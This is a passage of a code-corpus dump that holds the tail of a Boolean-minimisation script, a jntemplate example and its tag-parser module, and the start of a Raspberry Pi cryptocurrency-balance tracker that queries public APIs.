ovl = ovl+1
if k<ovl:
k = ovl
box = lista[b]
boxx = listb[b]
lista.remove(box)
listb.remove(boxx)
lista.insert(0, box)
listb.insert(0, boxx)
b = b+1
boxx = noessu
b = 0
while len(boxx) != 0:
for i in lista[b]:
if i in boxx:
last.append(listb[b])
boxx.remove(i)
b = b+1
llast = []
for i in last:
if i not in llast:
llast.append(i)
print( "essential아닌 prime =", llast)
print( "mim sop = ", essentialimplicant+llast)
findminsop(inputlist)
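# Hedged alternative sketch (not part of the original script): the "essential prime
# implicant" test above can also be written as a simple membership check -- a prime
# implicant is essential when it is the only one covering some minterm. `primes` is
# assumed to have the same shape as `inputlist`: (minterm_list, literal_string) pairs.
def essential_primes(primes):
    essentials = []
    for minterms, literal in primes:
        for m in minterms:
            # is any *other* implicant covering minterm m?
            if not any(m in other_minterms
                       for other_minterms, other_literal in primes
                       if other_literal != literal):
                essentials.append(literal)
                break
    return essentials
# essential_primes(inputlist) returns the implicants that uniquely cover at least one minterm.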
#########################################################################################
###################################classification_group#########################################
'''
# Split f into groups according to the number of 1s in each entry.
# f is received as a list; count the 1s of each element, then bucket the elements by that count and store them per group.
def numsort(n):
flag = 0
str_binary = bin(int(n))
i=0
for i in range (len(str_binary)):
if(str_binary[i] == '1'):
flag += 1
return flag
def function3 (a, lst) :
i=0
k=0
finallist = [ [] for k in range (int(a))]
for i in range (len(lst)):
finallist[numsort(lst[i])].append(lst[i])
return finallist
i=0
a=input("자리수를 입력하세요 : ")
n=int(input("자료의 개수를 입력하세요 : "))
list = [0]
for i in range (n):
list.append(input())
result=function3(a, list)
for i in result:
for j in i:
print(j, end = ' ')
print()
'''
###################################classification_group#########################################
``` |
{
"source": "jiniannet/jnt.py",
"score": 2
} |
#### File: jnt.py/examples/example.py
```python
import os
import time
import sys
sys.path.append('..')
from jntemplate import Template,engine,BaseLoader,FileLoader
class Article(object):
def __init__(self):
self.basis_id = 0
self.category_id = 0
self.content = ""
self.create_date = time.localtime(time.time())
self.default_picture = ""
self.description = ""
self.edit_date = time.localtime(time.time())
self.english_name = ""
self.module_id = 0
self.title = ""
class Product(object):
def __init__(self):
self.basis_id = 0
self.category_id = 0
self.content = ""
self.create_date = time.localtime(time.time())
self.date_price = 0
self.default_picture = ""
self.description = ""
self.download_url = ""
self.edit_date = time.localtime(time.time())
self.english_name = ""
self.example_url = ""
self.file_size = ""
self.gateway = ""
self.module_id = 0
self.title = ""
class Category(object):
def __init__(self):
self.category_id = 1
self.category_name = "栏目1"
self.create_date = time.localtime(time.time())
self.deph = 1
self.english_name = "001"
self.module_id = 1
class ProductModule(object):
def __init__(self):
self.basis_id = 0
self.module_name = ""
self.product_module_id = 0
class Help(object):
def __init__(self):
self.basis_id = 0
self.category_id = 0
self.content = ""
self.create_date = time.localtime(time.time())
self.default_picture = ""
self.description = ""
self.edit_date = time.localtime(time.time())
self.english_name = ""
self.module_id = 0
self.title = ""
class DbRead(object):
def test(self,message, id, result):
return "您输入的参数是有:%s %d %s" % message % id % str(result)
def get_help_list(self,category, product, module, type_id):
arr = []
arr.append(Help())
arr[-1].basis_id = 301
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "art001"
arr[-1].module_id = 1
arr[-1].title = "下单后可以修改订单吗?"
arr.append(Help())
arr[-1].basis_id = 301
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "art001"
arr[-1].module_id = 1
arr[-1].title = "无货商品几天可以到货?"
arr.append(Help())
arr[-1].basis_id = 301
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "art001"
arr[-1].module_id = 1
arr[-1].title = "合约机资费如何计算?"
arr.append(Help())
arr[-1].basis_id = 301
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "art001"
arr[-1].module_id = 1
arr[-1].title = "可以开发票吗?"
return arr
def get_article_list(self,id):
arr = []
arr.append(Article())
arr[-1].basis_id = 301
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "art001"
arr[-1].module_id = 1
arr[-1].title = "购物流程"
arr.append(Article())
arr[-1].basis_id = 301
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "art001"
arr[-1].module_id = 1
arr[-1].title = "会员介绍"
arr.append(Article())
arr[-1].basis_id = 301
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "art001"
arr[-1].module_id = 1
arr[-1].title = "生活旅行/团购"
arr.append(Article())
arr[-1].basis_id = 301
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "art001"
arr[-1].module_id = 1
arr[-1].title = "常见问题"
arr.append(Article())
arr[-1].basis_id = 301
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "art001"
arr[-1].module_id = 1
arr[-1].title = "联系客服"
return arr
def get_product_list(self):
arr = []
arr.append(Product())
arr[-1].basis_id = 201
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].date_price = 245
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].download_url = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "pro001"
arr[-1].example_url = ""
arr[-1].file_size = "564kb"
arr[-1].gateway = ""
arr[-1].module_id = 2
arr[-1].title = "产品1"
arr.append(Product())
arr[-1].basis_id = 202
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].date_price = 245
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].download_url = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "pro001"
arr[-1].example_url = ""
arr[-1].file_size = "564kb"
arr[-1].gateway = ""
arr[-1].module_id = 2
arr[-1].title = "产品2"
arr.append(Product())
arr[-1].basis_id = 203
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].date_price = 245
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].download_url = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "pro001"
arr[-1].example_url = ""
arr[-1].file_size = "564kb"
arr[-1].gateway = ""
arr[-1].module_id = 2
arr[-1].title = "产品3"
arr.append(Product())
arr[-1].basis_id = 204
arr[-1].category_id = 1
arr[-1].content = ""
arr[-1].create_date = time.localtime(time.time())
arr[-1].date_price = 245
arr[-1].default_picture = ""
arr[-1].description = ""
arr[-1].download_url = ""
arr[-1].edit_date = time.localtime(time.time())
arr[-1].english_name = "pro001"
arr[-1].example_url = ""
arr[-1].file_size = "564kb"
arr[-1].gateway = ""
arr[-1].module_id = 2
arr[-1].title = "产品4"
return arr
def get_category_list(self,mode):
arr = []
arr.append(Category())
arr[-1].category_id = 1
arr[-1].category_name = "栏目1"
arr[-1].create_date = time.localtime(time.time())
arr[-1].deph = 1
arr[-1].english_name = "001"
arr[-1].module_id = 1
arr.append(Category())
arr[-1].category_id = 2
arr[-1].category_name = "栏目2"
arr[-1].create_date = time.localtime(time.time())
arr[-1].deph = 1
arr[-1].english_name = "002"
arr[-1].module_id = 1
arr.append(Category())
arr[-1].category_id = 3
arr[-1].category_name = "栏目3"
arr[-1].create_date = time.localtime(time.time())
arr[-1].deph = 1
arr[-1].english_name = "003"
arr[-1].module_id = 1
arr.append(Category())
arr[-1].category_id = 4
arr[-1].category_name = "栏目4"
arr[-1].create_date = time.localtime(time.time())
arr[-1].deph = 1
arr[-1].english_name = "004"
arr[-1].module_id = 1
arr.append(Category())
arr[-1].category_id = 5
arr[-1].category_name = "栏目5"
arr[-1].create_date = time.localtime(time.time())
arr[-1].deph = 1
arr[-1].english_name = "005"
arr[-1].module_id = 1
arr.append(Category())
arr[-1].category_id = 6
arr[-1].category_name = "栏目6"
arr[-1].create_date = time.localtime(time.time())
arr[-1].deph = 1
arr[-1].english_name = "006"
arr[-1].module_id = 1
return arr
def get_product_url(self,model):
if model.english_name != None and model.english_name != "":
return "/Product/%s" % model.english_name
else:
return "/Product?id=%s" % model.english_name
def get_article_url(self,model):
if model.english_name != None and model.english_name != "":
return "/Article/%s" % model.english_name
else:
return "/Article?id=%s" % model.english_name
def get_help_url(self,model):
if model.english_name != None and model.english_name != "":
return "/Help/%s" % model.english_name
else:
return "/Help?id=%s" % model.english_name
def get_product_item(self,key):
model = Product()
model.basis_id = 1
model.category_id = 1
model.content = """<p style="text-align: center text-indent: 0"><img src="http://upload.chinaz.com/2015/0624/1435111490722.jpg" border="0" alt="视频网站 付费会员"></p>
<p>6月24日报道 文/肖芳</p>
<p>近日,爱奇艺高调宣布其月度付费VIP会员数已达501.7万,并称视频付费业务台风已经到来。而阿里巴巴宣布进入视频付费市场,将推出付费视频服务TBO(Tmall Box Office),它的模式将更接近美国在线影片租赁提供商Netflix,其中90%的TBO内容都将采用付费观看模式。</p>
<p>这不是业界首次探讨视频网站收费的可能性了。早在2008年,激动网就正式推出了付费点播品牌“激动派”,虽然2011年激动网声称80%的收入来自付费用户,如今却已转型淡出视频行业。其他的也基本都是“雷声大,雨点小”,付费没有形成足够的阵势。当时有说法称“谁第一个收费谁就第一个倒下”。</p>
<p>时隔5年视频网站再次呼唤用户付费。业内人士透露,目前视频网站或片方都已经在酝酿网络付费看剧,试图在网络付费领域上分一杯羹,最快明年就会试水。这一次的底气在哪?谈论这个问题之前不妨先从5年前的收费为何没有成气候说起。</p>
<p><strong>早年内容不成熟 付费1~2元也无人问津</strong></p>
<p>2010年,迅雷看看推出向用户收费的“红宝石影院”业务,一期推广高清下载,二期将推广高清在线观看,一部电影收费大约1元-2元钱,高清在线观看的收费项目将成为现实。</p>
<p>由迅雷看看当时的宣传页面可以窥见“红宝石影院”的初衷:“买一张盗版碟至少要花5元钱,而在红宝石上下载一部正版高清电影最低只花2元钱。正版比盗版还便宜。”虽然在业务推出前期,迅雷看看展开声势浩大的宣传,但“红宝石影院”后来也销声匿迹,迅雷看看的营收依然是以传统的广告为主。今年年初,迅雷把一直处于亏损状态下的看看出售,免于拖累上市公司。</p>
<p>花2元看正版,比5元买盗版碟还便宜,这个初衷是好的,但也要考虑收费实施的基础。一方面是用户付费意愿,另一方面是视频网站的服务能否达到收费的水平。</p>
<p>在用户付费意愿上,2010年某门户网站曾经做过一项调查。结果显示,愿意为视频点播付费的网友只有383名,而不愿意的则达到6095名,后者是前者的15倍。由此可见,只有6%的网友愿意付费,没有用户的支持视频网站畅想的再美好都无济于事。</p>
<p>另一方面,2010年前后,在线视频的品质还不够好。由于带宽等因素的限制,视频很难达到高清的效果。同时,视频网站购买版权的意识也不如现在强,很多内容都来自网友上传,体验很差。</p>
<p>当时,另一家坚持免费观看的视频网站负责人道出了视频收费不宜大规模推广的原委。她指出,要想让用户掏钱看视频,首先要满足两个条件:一是网站要有独家的、不可替代的内容,否则网友不会“买账”;二是用户的使用习惯。对于前者,可以靠投入重金买版权来实现;但对于后者,她并不乐观地表示,让习惯了免费看视频的用户掏钱买收视权,短期内是不太现实的。</p>
<p><strong>服务升级后 视频网站亟需付费扭转巨亏</strong></p>
<p>可以看到,2010年之后视频网站在朝着正版化、高清化发展。视频网站在不断砸钱购买内容,同时也在改善视频播放技术,让网友获得更好的观看体验。</p>
<p>对比2010年优酷网和如今优酷土豆的财报便可以发现端倪。2010年第四季度,优酷的内容成本为1250万美元,比2009年增长11%,净亏损为570万美元。2014年第四季度,优酷土豆的内容成本为9,720万美元,是2010年同期的8倍,净亏损为5130万美元,接近2010年同期的10倍。</p>
<p>越是投入越是亏得厉害,不只是优酷,这是近5年来视频行业发展的缩影。可以看到多家视频网站因资金问题“卖身”,而现在留下的视频网站背后都背靠大树。没有巨头的支持,视频“烧钱”的游戏很难再持续下去。</p>
<p style="text-align: center text-indent: 0"><img src="http://upload.chinaz.com/2015/0624/1435111500344.jpg" border="0" alt="视频网站 付费会员"></p>
<p>视频网站付费会员增长超700% 苦熬7年再度掀付费潮</p>
<p>归根到底,这是由于广告收入的增速远远不及内容成本的增速(图为2014年优酷土豆内容成本和广告收入成本的同比增长),依靠内容投入拉动营收就如同一个无底洞,只会将自己陷得越来越深。</p>
"""
model.create_date = time.localtime(time.time())
model.date_price = 940
model.default_picture = "http://upload.chinaz.com/2015/0624/1435111500344.jpg"
model.description = "近日,爱奇艺高调宣布其月度付费VIP会员数已达501.7万,并称视频付费业务台风已经到来。而阿里巴巴宣布进入视频付费市场,将推出付费视频服务TBO(Tmall Box Office),它的模式将更接近美国在线影片租赁提供商Netflix,其中90%的TBO内容都将采用付费观看模式。"
model.edit_date = time.localtime(time.time())
model.english_name = "001"
model.example_url = "http://www.baidu.com"
model.file_size = "54KB"
model.title = "视频网站付费会员增长超700% 苦熬7年再度掀付费潮"
return model
def get_default_int(self,key, defaultValue):
return defaultValue
def get_product_module(self,product):
arr = []
arr.append(ProductModule())
arr[-1].basis_id = 101
arr[-1].module_name = "测试模块"
arr[-1].product_module_id = product
arr.append(ProductModule())
arr[-1].basis_id = 102
arr[-1].module_name = "订单模块"
arr[-1].product_module_id = product
arr.append(ProductModule())
arr[-1].basis_id = 103
arr[-1].module_name = "产品模块"
arr[-1].product_module_id = product
arr.append(ProductModule())
arr[-1].basis_id = 104
arr[-1].module_name = "新闻模块"
arr[-1].product_module_id = product
return arr
def get_page_index(self):
return 1
def get_pager(self):
return '<span>首页</span> <span>上一页</span> <a href=\"?page=1\">1</a> <span>下一页</span> <span>末页</span>'
if __name__ == '__main__':
loader = FileLoader()
db = DbRead()
loader.directories.append(os.getcwd()+'\\templets\\')
loader.directories.append(os.getcwd()+'\\templets\\public\\')
print(os.getcwd()+'\\templets\\')
engine.configure(loader=loader)
template = engine.load("questionlist.html")
template.set("func", db)
html = template.render()
print(html)
```
#### File: jnt.py/jntemplate/parsers.py
```python
from abc import abstractclassmethod, ABCMeta
from jntemplate.core import VariableTag, ValueTag, IfTag, ElseifTag, ElseTag, \
ForeachTag, FunctionTag, ExpressionTag, SetTag, EndTag, TextTag, ReferenceTag,\
IncludeTag, IndexTag, LoadTag
import jntemplate.utils
from jntemplate.nodes import TokenKind
__all__ = ["VariableParser", "StringParser", "SetParser", "NumberParser",
"LoadParser", "IncludeParser", "IfParser", "FunctionParser",
"ForeachParser", "EndParser", "ElseifParser", "EleseParser",
"BooleanParser", "IndexParser", "ComplexParser"]
class TagParser(object):
@abstractclassmethod
def parse(self, template_parser, tc):
pass
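# Hedged sketch of how these parsers are typically dispatched (an assumption about
# the template engine, not code from this library): the template parser tries each
# registered parser in order and keeps the first non-None tag.
def _first_matching_tag(template_parser, tc, parsers):
    for parser in parsers:
        tag = parser.parse(template_parser, tc)
        if tag is not None:
            return tag
    return None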
class VariableParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and len(tc) == 1 \
and tc[0].kind == TokenKind.text_data:
tag = VariableTag()
tag.name = tc[0].string()
return tag
return None
class IndexParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and len(tc) > 3 \
and tc[-1].kind == TokenKind.right_bracket:
y = len(tc) - 1
x = -1
pos = 0
i = y
while i >= 0:
if tc[i].kind == TokenKind.dot and pos == 0:
return None
if tc[i].kind == TokenKind.right_bracket:
pos += 1
i -= 1
continue
if tc[i].kind == TokenKind.left_bracket:
pos -= 1
if pos == 0 and x == -1:
x = i
i -= 1
if x == -1:
return None
tag = IndexTag()
tag.container = template_parser.read(tc[0: x])
tag.index = template_parser.read(tc[x + 1: y])
return tag
return None
class StringParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and len(tc) == 3 \
and tc[0].kind == TokenKind.string_start \
and tc[1].kind == TokenKind.string \
and tc[2].kind == TokenKind.string_end:
tag = ValueTag()
tag.value = tc[1].text
return tag
return None
class SetParser(TagParser):
def parse(self, template_parser, tc):
if tc == None or template_parser == None:
return None
if len(tc) == 5 \
and tc[0].text == "set" \
and tc[1].kind == TokenKind.left_parentheses \
and tc[3].text == "=" \
and tc[-1].kind == TokenKind.right_parentheses:
tag = SetTag()
tag.name = tc[2].text
coll = tc[4: -1]
tag.value = template_parser.read(coll)
return tag
# if len(tc) == 2 \
# and tc[0].kind == TokenKind.text_data \
# and tc[1].kind == TokenKind.operator \
# and (tc[1].text == "++" or tc[1].text == "--"):
# tag = SetTag()
# tag.name = tc[0].text
# child = ExpressionTag()
# child.add_child()
# tag.value = template_parser.read(coll)
# return tag
if len(tc) > 2 \
and tc[0].kind == TokenKind.text_data \
and tc[1].text == "=":
tag = SetTag()
tag.name = tc[0].text
coll = tc[2:]
tag.value = template_parser.read(coll)
return tag
return None
class NumberParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and len(tc) == 1 \
and tc[0].kind == TokenKind.number:
tag = ValueTag()
if tc[0].text.find('.') == -1:
tag.value = int(tc[0].text)
else:
tag.value = float(tc[0].text)
return tag
return None
class LoadParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) > 2 \
and tc[0].text == "load" \
and tc[1].kind == TokenKind.left_parentheses \
and tc[-1].kind == TokenKind.right_parentheses:
tag = LoadTag()
tag.path = template_parser.read(tc[2:-1])
return tag
class IncludeParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) > 2 \
and tc[0].text == "include" \
and tc[1].kind == TokenKind.left_parentheses \
and tc[-1].kind == TokenKind.right_parentheses:
tag = IncludeTag()
tag.path = template_parser.read(tc[2:-1])
return tag
class IfParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) > 3 \
and tc[0].text == "if":
# n = len(tc)
if tc[1].kind != TokenKind.left_parentheses \
or tc[-1].kind != TokenKind.right_parentheses:
raise Exception("syntax error near :%s line:%d col:%d" % jntemplate.utils.token_concat(
tc) % tc[0].begin_line % tc[0].begin_column)
tag = IfTag()
child_tag = ElseifTag()
coll = tc[2: -1]
child_tag.test = template_parser.read(coll)
child_tag.first = coll[0]
tag.add_child(child_tag)
while template_parser.next():
if isinstance(template_parser.tag, EndTag):
tag.add_child(template_parser.tag)
return tag
elif isinstance(template_parser.tag, ElseifTag) or \
isinstance(template_parser.tag, ElseTag):
tag.add_child(template_parser.tag)
else:
tag.children[-1].add_child(template_parser.tag)
raise Exception("if is not properly closed by a end tag:%s line:%d col:%d" %
jntemplate.utils.token_concat(tc) % tc[0].begin_line % tc[0].begin_column)
return None
class FunctionParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) > 2 \
and tc[0].kind == TokenKind.text_data \
and tc[1].kind == TokenKind.left_parentheses \
and tc[-1].kind == TokenKind.right_parentheses:
tag = FunctionTag()
tag.name = tc[0].text
pos = 0
start = 2
end = 0
i = 2
max = len(tc)
while i < max:
end = i
if tc[i].kind == TokenKind.comma:
if pos == 0:
coll = tc[start: end]
if len(coll) > 0:
tag.add_child(template_parser.read(coll))
start = i + 1
else:
if tc[i].kind == TokenKind.left_parentheses:
pos += 1
elif tc[i].kind == TokenKind.right_parentheses:
pos -= 1
if i == len(tc) - 1:
coll = tc[start: end]
if len(coll) > 0:
tag.add_child(template_parser.read(coll))
i += 1
return tag
return None
class ForeachParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) > 4 \
and (tc[0].text == "for" or tc[0].text == "foreach") \
and tc[1].kind == TokenKind.left_parentheses \
and tc[2].kind == TokenKind.text_data \
and tc[3].text == "in" \
and tc[-1].kind == TokenKind.right_parentheses:
tag = ForeachTag()
tag.name = tc[2].text
coll = tc[4:-1]
tag.source = template_parser.read(coll)
while template_parser.next():
tag.add_child(template_parser.tag)
if isinstance(template_parser.tag, EndTag):
return tag
raise Exception("foreach is not properly closed by a end tag:%s line:%d col:%d" %
jntemplate.utils.token_concat(tc) % tc[0].begin_line % tc[0].begin_column)
class EndParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) == 1 \
and tc[0].text == "end":
return EndTag()
return None
class ElseifParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) > 3 \
and (tc[0].text == "elseif" or tc[0].text == "elif") \
and tc[1].kind == TokenKind.left_parentheses \
and tc[-1].kind == TokenKind.right_parentheses:
tag = ElseifTag()
coll = tc[2:-1]
tag.test = template_parser.read(coll)
return tag
return None
class EleseParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) == 1 \
and tc[0].text == "else":
return ElseTag()
return None
class BooleanParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) == 1 \
and (tc[0].text == "true" or tc[0].text == "false"):
tag = ValueTag()
if tc[0].text == "true":
tag.value = True
else:
tag.value = False
return tag
return None
class ComplexParser(TagParser):
def parse(self, template_parser, tc):
if tc != None \
and template_parser != None \
and len(tc) > 2:
start = 0
end = 0
pos = 0
is_func = False
data = []
queue = []
for i in range(len(tc)):
end = i
if tc[i].kind == TokenKind.left_parentheses:
if pos == 0:
if i > 0 and tc[i - 1].kind == TokenKind.text_data:
is_func = True
pos += 1
elif tc[i].kind == TokenKind.right_parentheses:
if pos > 0:
pos -= 1
else:
raise Exception("syntax error near ):%s line:%d col:%d" % jntemplate.utils.token_concat(
tc) % tc[0].begin_line % tc[0].begin_column)
if pos == 0:
if not is_func:
queue.append(tc[start + 1: end])
else:
queue.append(tc[start: end+1])
data.append(None)
start = i + 1
elif pos == 0 and (tc[i].kind == TokenKind.dot or tc[i].kind == TokenKind.operator):
if end > start:
queue.append(tc[start: end])
data.append(None)
start = i + 1
data.append(tc[i])
if i == len(tc) - 1 and end >= start:
if start == 0 and end == i:
raise Exception("Unexpected tag:%s line:%d col:%d" % jntemplate.utils.token_concat(
tc) % tc[0].begin_line % tc[0].begin_column)
queue.append(tc[start: end+1])
data.append(None)
start = i + 1
if len(queue) == 1 and queue[0] == tc:
return None
tags = []
i = 0
while i < len(data):
if data[i] == None:
tags.append(template_parser.read(queue[0]))
del queue[0]
elif data[i].kind == TokenKind.dot:
if len(tags) == 0 or i == len(data) - 1 or data[i + 1] != None:
raise Exception("syntax error near :%s line:%d col:%d" % jntemplate.utils.token_concat(
tc) % tc[0].begin_line % tc[0].begin_column)
if isinstance(tags[-1], ReferenceTag):
tags[-1].add_child(template_parser.read(queue[0]))
del queue[0]
else:
t = ReferenceTag()
t.add_child(tags[-1])
t.add_child(template_parser.read(queue[0]))
del queue[0]
tags[-1] = t
i += 1
elif data[i].kind == TokenKind.operator:
tags.append(TextTag())
tags[-1].first = data[i]
i += 1
if len(tags) == 1:
return tags[0]
if len(tags) > 1:
t = ExpressionTag()
for i in range(len(tags)):
t.add_child(tags[i])
tags.clear()
return t
i += 1
return None
``` |
{
"source": "jinie/crypto_tracker",
"score": 2
} |
#### File: jinie/crypto_tracker/crypto_tracker.py
```python
import json
import time
from io import BytesIO
from pprint import pprint
import locale
import PIL
import inkyphat
import krakenex
import matplotlib
matplotlib.use('Agg')
import pandas as pd
import requests
from PIL import Image, ImageDraw, ImageFont
from pykrakenapi import KrakenAPI
from collections import defaultdict
import collections
import functools
class memoized(object):
'''Decorator. Caches a function's return value each time it is called.
If called later with the same arguments, the cached value is returned
(not reevaluated).
'''
def __init__(self, func):
self.func = func
self.cache = {}
def __call__(self, *args):
if not isinstance(args, collections.Hashable):
# uncacheable. a list, for instance.
# better to not cache than blow up.
return self.func(*args)
if args in self.cache:
return self.cache[args]
else:
value = self.func(*args)
self.cache[args] = value
return value
def __repr__(self):
'''Return the function's docstring.'''
return self.func.__doc__
def __get__(self, obj, objtype):
'''Support instance methods.'''
return functools.partial(self.__call__, obj)
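# Hedged usage sketch of the decorator above (the function below is illustrative,
# not part of this module): repeated calls with the same hashable arguments are
# served from memoized.cache instead of being recomputed.
#
#   @memoized
#   def fib(n):
#       return n if n < 2 else fib(n - 1) + fib(n - 2)
#
#   fib(30)   # each distinct n is computed once, then cached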
class Config(object):
def __init__(self, filename):
with open(filename, 'rt') as f:
conf = json.loads(f.read())
for k,v in conf.items():
setattr(self, k, v)
def get_currencies(self):
return {
'XRP': XrpHandler(self),
'ETH': EthHandler(self),
'XBT': XbtHandler(self),
'LTC': LtcHandler(self),
}
class CurrencyHandler(object):
'''Handler base class for a crypto currency'''
def __init__(self, config):
self.config = config
self._fiat_currency = config.fiat_currency
def update(self, accounts):
raise Exception('Not implemented')
@memoized
def get_logo_image(self,url):
try:
req = requests.get(url)
image = BytesIO(req.content)
img = PIL.Image.open(image)
img = img.convert('P')
img.putpalette((0, 0, 0, 255, 255, 255, 255, 0, 0) + (0, 0, 0)*252)
img.thumbnail((70, 104))
return img
except:
return None
def logo(self):
return None
def fiat_currency(self):
return self._fiat_currency
class LtcHandler(CurrencyHandler):
def update(self, accounts):
total = 0
for act in accounts:
url = 'https://api.blockcypher.com/v1/ltc/main/addrs/{}'.format(
act)
req = requests.get(url)
balance = json.loads(req.text)
if 'final_balance' in balance:
total += balance['final_balance']
return total / 100000000
def logo(self):
return self.get_logo_image('http://ltc.133.io/images/logosizes/ltc800.png')
class XbtHandler(CurrencyHandler):
def update(self, accounts):
url = 'https://www.blockonomics.co/api/balance'
addrs = ""
for a in accounts:
addrs += a + " "
body = json.dumps({'addr': addrs})
req = requests.post(url, data=body)
balances = json.loads(req.text)
total = 0
if 'response' not in balances:
pprint(balances)
return 0
for act in balances['response']:
total += act['confirmed']
return total/100000000
def logo(self):
return self.get_logo_image('https://bitcoin.org/img/icons/opengraph.png')
class XrpHandler(CurrencyHandler):
def update(self, accounts):
total = 0
for account in accounts:
url = "https://data.ripple.com/v2/accounts/{}/balances".format(
account)
req = requests.get(url)
balances = json.loads(req.text)
for b in balances['balances']:
if b['currency'] == 'XRP':
total += float(b['value'])
return total
def logo(self):
return self.get_logo_image('https://www.shareicon.net/data/512x512/2016/07/08/117527_ripple_512x512.png')
class EthHandler(CurrencyHandler):
def update(self, accounts):
total = 0
for act in accounts:
url = 'https://api.ethplorer.io/getAddressInfo/{}?apiKey=freekey'.format(
act)
req = requests.get(url)
balances = json.loads(req.text)
total += balances['ETH']['balance']
return total
def logo(self):
return self.get_logo_image('https://www.ethereum.org/images/logos/ETHEREUM-ICON_Black_small.png')
class CryptoTracker(object):
def __init__(self,config):
api = krakenex.API()
self.k = KrakenAPI(api)
self.config = config
def get_exchange_rate(self, crypto, fiat):
pair = "X{}Z{}".format(crypto, fiat)
ticker = self.k.get_ticker_information(pair)
return ticker
def get_currencies(self):
return {
'XRP': XrpHandler(self.config),
'ETH': EthHandler(self.config),
'XBT': XbtHandler(self.config),
'LTC': LtcHandler(self.config),
}
def get_local_currency(self):
return self.config.local_currency
def get_fiat_currency(self):
return self.config.fiat_currency
def get_exchange_rates(self, base=None):
url = 'https://api.fixer.io/latest'
if base is not None:
url += '?base={}'.format(base)
req = requests.get(url)
rates = json.loads(req.text)
return rates['rates']
def update_currencies(self):
accounts = self.config.accounts
balances = defaultdict(float)
rates = defaultdict(float)
crypto_currencies = self.get_currencies()
for curr in accounts.keys():
ohlc = self.get_exchange_rate(curr, crypto_currencies[curr].fiat_currency())
if ohlc is not None and len(ohlc) > 0:
rates[curr] = float(ohlc.iloc[0]['c'][0])
balances[curr] += crypto_currencies[curr].update(accounts[curr])
positions = {curr: balances[curr] * rates[curr] for curr in balances if curr in rates and curr in balances}
return balances, positions
class DisplayHandler(object):
def __init__(self, config, cryptotracker):
locale.setlocale(locale.LC_ALL, '')
self.cryptotracker = cryptotracker
self.config = config
def cga_quantize(self, image):
pal_image = Image.new("P", (1, 1))
pal_image.putpalette(
(0, 0, 0, 255, 0, 0, 255, 255, 255) + (0, 0, 0)*252)
return image.convert("RGB").quantize(palette=pal_image)
def ax_to_image(self, ax):
buf = BytesIO()
fig = ax.get_figure()
fig.savefig(buf, format='png', dpi=fig.dpi, bbox_inches='tight')
im = Image.new('RGB', (inkyphat.WIDTH, inkyphat.HEIGHT),
(255, 255, 255))
pi = Image.open(buf)
pi.thumbnail((inkyphat.WIDTH, inkyphat.HEIGHT))
w, h = pi.size
xo = (inkyphat.WIDTH - w)//2
yo = (inkyphat.HEIGHT - h)//2
im.paste(pi, (xo, yo), pi)
return self.cga_quantize(im)
def get_position_image(self, positions):
v = pd.Series(positions)
plot = v.plot(kind='bar', figsize=(2.3, 1), fontsize=13, color=['r', ])
plot.set_facecolor('w')
x_axis = plot.axes.get_yaxis()
x_axis.set_visible(False)
return self.ax_to_image(plot)
def create_image(self, logo, lines):
im = Image.new("P", (inkyphat.WIDTH, inkyphat.HEIGHT), 255)
